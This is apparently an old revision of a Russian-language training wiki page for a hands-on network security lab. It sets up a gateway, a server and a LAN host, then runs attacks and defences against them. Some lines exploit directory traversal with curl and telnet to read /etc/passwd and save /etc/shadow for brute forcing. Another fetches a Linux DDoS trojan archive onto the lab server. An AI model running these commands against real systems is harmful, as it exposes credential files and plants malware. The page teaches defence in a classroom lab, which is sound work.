This is an old revision of the document!
Сценарий: 172.16.1.0/24 - WAN сеть, 192.168.X/24 - “белая” DMZ сеть, 192.168.100+X - “серая” LAN сеть
Запустите с правами Administrator C:\cmder\cmder.exe bash cd test -d conf && rm -r conf git clone http://val.bmstu.ru/unix/conf.git cd conf/virtualbox/ !!! 3 - это номер курса, вместо X укажите Ваш номер стенда, если не знаете его, спросите преподавателя !!! ./setup.sh X 3
Клонируем server в lan
gate# ifconfig eth2 inet 192.168.100+X.1/24
gate# sh net_gate.sh gate# cat /etc/network/interfaces
... auto eth2 iface eth2 inet static address 192.168.100+X.1 netmask 255.255.255.0
gate# init 6
gate# apt update
lan# ifconfig eth0 inet 192.168.100+X.10/24
lan# sh net_server.sh lan# hostnamectl set-hostname lan.corpX.un lan# cat /etc/network/interfaces
auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.100+X.10 netmask 255.255.255.0 gateway 192.168.100+X.1
lan# init 6
server# sh net_server.sh server# init 6
lan# apt update
server# sh conf/dns.sh lan# cat /etc/resolv.conf
search corpX.un nameserver 192.168.X.10
lan# ssh-copy-id server lan# ssh-copy-id gate lan# scp /etc/resolv.conf server:/etc/ lan# scp /etc/resolv.conf gate:/etc/
Будет развернут на системе server
Разворачиваем на системе gate в сети LAN
Будет развернут на системе lan
Сценарий: внешний корпоративный сайт на server
Сценарий: сканирование портов сервисов системы server (с lan или gate.isp.un по ip адресу), находим web сервер
Сценарий: автоматизированный поиск уязвимостей, находим “directory traversal”
Сценарий: эксплуатируем найденную уязвимость “directory traversal”
lan# curl --path-as-is http://192.168.X.10/../../../etc/passwd gate.isp.un$ fetch -o - http://192.168.X.10/../../../etc/passwd gate.isp.un$ telnet 192.168.X.10 80
GET /../../../etc/passwd HTTP/1.1
Сценарий: Brute force-атака по известным login
lan# curl --path-as-is http://192.168.X.10/../../../etc/shadow | tee shadow
Сценарий: находим модифицированное ПО (можно изменить код web сервера)
server# cd / server# wget http://gate.isp.un/unix/xor_ddos_linux_trojan.tgz server# tar -xvzf xor_ddos_linux_trojan.tgz
Сценарий: фиксируем обращения к файлам базы данных учетных записей со стороны процессов с EUID=user1/student. Можно тестировать из shell или запустить www сервер на server с правами user1/student
Сценарий: Запуск www сервера с правами пользователя user1/student не позволит получить через него доступ к /etc/shadow
Сценарий: с помощью POSIX ACL запрещаем пользователю user1 читать файл /etc/passwd
Сценарий: ограничения, накладываемые политиками на www сервер на server не позволят получить через него доступ к любым файлам, кроме разрешенных даже в случае запуска его с правами root
Сценарий: запуск www сервера на server в chroot позволит получить через него доступ только к файлам, которые мы скопировали в chroot окружение
Сценарий: переносим www хостинг в контейнер
server# systemctl stop inetutils-inetd && systemctl disable inetutils-inetd
iptables -F FORWARD iptables -P FORWARD ACCEPT
Демонстрирует преподаватель
Сценарий: разворачиваем на server, MTA для домена corpX.un, IMAP без SSL. Учетные записи почтовых пользователей не должны иметь shell, предоставляющий доступ к командной строке
server# apt install ansible server# ansible-playbook conf/ansible/roles/mail.yml
Сценарий: заменяем банеры сервисов SMTP, IMAP, FTP, HTTP, CIFS, SSH
gate# curl -I http://www.corpX.un/
Сценарий: перехват учетных данных при обновлении пользователем user1 веб информации на server по протоколу ftp
Сценарий: для хостинга на www используем SFTP вместо FTP
Демонстрирует преподаватель
Сценарий: замена сервиса HTTP на HTTPS на www
Сценарий:
Дополнительные задания:
server# cat /etc/bind/corpX.un
... gowebd A 192.168.X.1
server# service named restart
Дополнительные задания:
Задание: использование пользовательских сертификатов
lan.corpX.un:~# cp -v user*crt /var/www/html/
server# cat /etc/bind/corpX.un
... lan A 192.168.100+X.10
server# service named restart
lan# cp -v user* /disk2/samba/ lan# cp /var/www/html/ca* /disk2/samba/ lan# chown -v games /disk2/samba/*
Сценарий: использование пользовательских сертификатов для PEM :)
Сценарий: использование пользовательских сертификатов для аутентификации и авторизации доступа к сайту www
lan# curl --cert user1.crt --key user1.key --cacert /var/www/html/ca.crt https://www.corpX.un/cgi-bin/test-cgi
Сценарий: разрешаем SSH подключение к www только из LAN
Сценарий: размещаем данные на шифрованном разделе для lan сервиса SAMBA (сетевой диск с двойным дном:)
Сценарий: защита LAN от посторонних сервисов DHCP
Сценарий: защита http сервиса на server от DDOS
Сценарий: Honeypot на gate
Сценарий: блокируем атаки на SSH сервис на на server
Сценарий: подключаемся с “домашнего” компьютера по RDP к компьютеру в LAN сети предприятия через “рабочую” linux систему, с которой есть доступ в LAN
Реализация: Отключаем на host системе VirtualBox Host-Only Network адаптер и, используя доступность сети LAN с server, осуществляем доступ по RDP к системе client1 через учетную запись user1 системы server
Сценарий: подключаемся с “домашнего” компьютера по RDP или SSH к компьютеру в LAN сети предприятия, через “внешнюю” linux систему, к которой “заранее” установлено SSH соединение из LAN
Реализация: отключаем доступность сети LAN “отовсюду”, считаем server - “внешним” ресурсом (например VPS), осуществляем доступ по RDP к client1 или SSH к lan через туннель в SSH соединении к server, установленном с client1 или lan
Сценарий: требуется предоставить авторизованный доступ пользователей, работающих на ноутбуках и ездящих в командировки, к любым сервисам в сети LAN компании, например - CIFS
lan# scp /etc/ssl/openssl.cnf gate:/etc/ssl/ lan# scp /var/www/html/ca.crt gate: lan# scp /var/www/html/ca.crl gate:
Сценарий: требуется объединить сети филиалов (обсудить)